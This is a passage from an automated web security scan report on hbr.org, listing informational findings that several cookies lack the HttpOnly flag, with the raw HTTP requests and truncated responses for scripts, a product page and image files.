previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/hbrg/google_book_preview_check.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/hbrg/google_book_preview_check.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:18 GMT Server: Apache Last-Modified: Tue, 11 May 2010 21:09:02 GMT ETag: "67f8f-5a8-48657ef4e3780" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:18 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 1448 Content-Type: application/x-javascript // checks to see if the Google Book preview is present, and if so, insert img that links to Google book preview // if there isn't a Google Book preview present, no img tag is inserted - this logic ch...[SNIP]...
6.44. http://hbr.org/hbrg-main/resources/scripts/marketing/baynote.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/marketing/baynote.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/marketing/baynote.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:25 GMT Server: Apache Last-Modified: Mon, 10 May 2010 16:08:25 GMT ETag: "12e8d7-3fdb-4863f9e601040" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:25 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 16347 Content-Type: application/x-javascript var BaynoteJSVersion="$Revision: 3.17 $";var BaynoteIgnored=false;var BN_READY_SIGNAL="ReadySignal";var Strategy={"ScriptDOMInject":2,"OnLoadInject":3};if(typeof(baynote_globals)=="undefined")var bay...[SNIP]...
6.45. http://hbr.org/hbrg-main/resources/scripts/marketing/marketing.min.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/marketing/marketing.min.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/marketing/marketing.min.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:25 GMT Server: Apache Last-Modified: Thu, 03 Nov 2011 19:17:51 GMT ETag: "12e975-f7d-4b0d971d4b5c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:25 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 3965 Content-Type: application/x-javascript $(document).ready(function(){if($("#stay_connected").length!=0){animatedcollapse.addDiv("sc_detail_iphone","speed=800,persist=1,group=sc_detail");animatedcollapse.addDiv("sc_detail_newsletters","speed...[SNIP]...
6.46. http://hbr.org/hbrg-main/resources/scripts/most-jsonp.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/most-jsonp.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/most-jsonp.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:23 GMT Server: Apache Last-Modified: Tue, 11 Oct 2011 20:39:58 GMT ETag: "5ffcb-6bb-4af0be9272380" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:23 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 1723 Content-Type: application/x-javascript var mostServer = "http://hbr.org" var mostUrlBase = mostServer + "/service/restv1/most-popular/" var mostDailyBlogs = "/most_hbr/10/" var mostDailyComments = "/commented/10/" var mostWidgetCMTag = "?c...[SNIP]...
6.47. http://hbr.org/hbrg-main/resources/scripts/paywall.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/paywall.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/paywall.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:23 GMT Server: Apache Last-Modified: Tue, 11 Oct 2011 15:22:33 GMT ETag: "600ec-cd3-4af0779fb8040" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:23 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 3283 Content-Type: application/x-javascript // ==ClosureCompiler== // @compilation_level SIMPLE_OPTIMIZATIONS // @output_file_name paywall-min.js // ==/ClosureCompiler== var currentUrl = document.location.href; var paywallServer = "http:...[SNIP]...
6.48. http://hbr.org/hbrg-main/resources/scripts/plugins.min.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/plugins.min.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/plugins.min.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:23 GMT Server: Apache Last-Modified: Fri, 26 Aug 2011 01:32:04 GMT ETag: "600f4-a647-4ab5e833e0d00" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:23 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 42567 Content-Type: application/x-javascript /* Animated Collapse for Stay Connected Widget */ var animatedcollapse={divholders:{},divgroups:{},lastactiveingroup:{},preloadimages:[],show:function(a){if(typeof a=="object")for(var b=0;b<a.length;...[SNIP]...
6.49. http://hbr.org/hbrg-main/resources/scripts/scripts.min.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/scripts.min.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/scripts.min.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:24 GMT Server: Apache Last-Modified: Thu, 27 Oct 2011 16:04:55 GMT ETag: "5faa1-5718-4b049eef557c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:24 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 22296 Content-Type: application/x-javascript var serverPrefix="http://hbr.org/",disableSearchSponsorship=true,toggleDrawer=function(){var b=$("#mastheadDrawerContent"),c=$("#exploreLink");b.hasClass("off")?(b.slideDown("fast"),b.removeClass("off...[SNIP]...
6.50. http://hbr.org/hbrg-main/resources/scripts/search-supplemental.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/search-supplemental.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/search-supplemental.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:23 GMT Server: Apache Last-Modified: Fri, 14 Oct 2011 17:04:57 GMT ETag: "5fe62-601-4af4541b7a040" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:23 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 1537 Content-Type: application/x-javascript // search scripts function onClickSearchGo(formID) { var Nttvalue = document.getElementById(formID).value; if (Nttvalue != 'Search HBR.org') { var searchUrl = "/search/" + encodeURI...[SNIP]...
6.51. http://hbr.org/hbrg-main/resources/scripts/subscriber-search.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/scripts/subscriber-search.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/scripts/subscriber-search.js HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:23 GMT Server: Apache Last-Modified: Wed, 06 Jul 2011 17:18:01 GMT ETag: "61069-13dc-4a769c8510440" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:23 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 5084 Content-Type: application/x-javascript var cookieName = 'srchPref'; var cookieValue = '1'; var cookieValidity = 365; //days // Should really update this to read them off the page since they differ between QA and PRD var subscriberPrefs = n...[SNIP]...
6.52. http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; Domain=hbr.org; Expires=Sat, 24-Dec-2011 14:09:17 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.navfund.com/resources
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:17 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 X-Powered-By: JSF/1.2Set-Cookie: HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; Domain=hbr.org; Expires=Sat, 24-Dec-2011 14:09:17 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:09:17 GMT LEG: 5 Vary: Accept-Encoding Content-Length: 47236 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea...[SNIP]...
6.53. http://hbr.org/products/12795-PDF-ENG/thumbnail/thumbnail.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/products/12795-PDF-ENG/thumbnail/thumbnail.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/12795-PDF-ENG/thumbnail/thumbnail.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:41 GMT Server: Apache Last-Modified: Tue, 20 Apr 2010 14:15:17 GMT ETag: "9864b-cc1-484abb4f3e740" Accept-Ranges: bytes Content-Length: 3265 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:41 GMT LEG: 5 Content-Type: image/gif GIF89ad..........t..................~QNN...fff...333.....3........N.. .....,.....3..... ...................33P...f.ff......ff33...yX.f3f33.. ....3....3.3...f3.............3333......f...f.......3..6....[SNIP]...
6.54. http://hbr.org/products/13292-PDF-ENG/thumbnail/thumbnail.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/products/13292-PDF-ENG/thumbnail/thumbnail.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/13292-PDF-ENG/thumbnail/thumbnail.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:41 GMT Server: Apache Last-Modified: Fri, 23 Jul 2010 14:58:58 GMT ETag: "8f851-1070-48c0f46427080" Accept-Ranges: bytes Content-Length: 4208 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:41 GMT LEG: 5 Content-Type: image/gif GIF89ad.......eu.%F..1..;..&.........TTT.............:\.b}.Ll.....0...###rrr...................u..Us...............BBB:::.,Q.................(.........III.... 3.......Ee.y...A.......%K]]].x....)))...z...[SNIP]...
6.55. http://hbr.org/products/1915-PBK-ENG/thumbnail/thumbnail.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/products/1915-PBK-ENG/thumbnail/thumbnail.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/1915-PBK-ENG/thumbnail/thumbnail.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:41 GMT Server: Apache Last-Modified: Tue, 30 Dec 2008 03:59:00 GMT ETag: "40bec-e8d-45f3b9c7d2900" Accept-Ranges: bytes Content-Length: 3725 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:41 GMT LEG: 5 Content-Type: image/gif GIF89ad.............h..V....fN#5GU.........w..Vepa..............o|.*q3....'5...K\g.....9...j.o...$6D..8bpy..(.............*$6..........K.R=....i......CS^......v.{....i'.R".......Q@.O..D..wJ..A.....d?...[SNIP]...
6.56. http://hbr.org/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
